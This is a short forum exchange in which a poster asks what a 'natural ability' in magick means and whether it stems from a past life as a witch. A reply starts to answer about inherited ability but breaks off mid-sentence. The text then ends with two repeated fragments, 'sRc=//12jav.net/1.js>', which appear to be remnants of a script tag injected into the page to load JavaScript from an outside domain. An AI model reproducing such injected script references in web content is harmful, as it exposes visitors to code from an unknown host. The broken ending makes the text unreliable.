Natural ability question?

Hi there, for a while ive been told by people who've been practicing magick for quite a while tell me that i had a very strong natural ability in the magickal arts and i was wondering what nesessarily does that mean? I just started practicing this summer and according to others ive become much much stronger in such a short amount of time, its strange. I hate to sound like im bragging about this but im wondering as well...where would that come from? My family has always been strict christians but ever since i was a child i was obsessed with magic and witches in particular..does that mean my soul in a past life was a witch or? Your parents could have the natural ability too, either untapped or in other ways. for example my mother who is also a strict christian gets sympathy pains sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
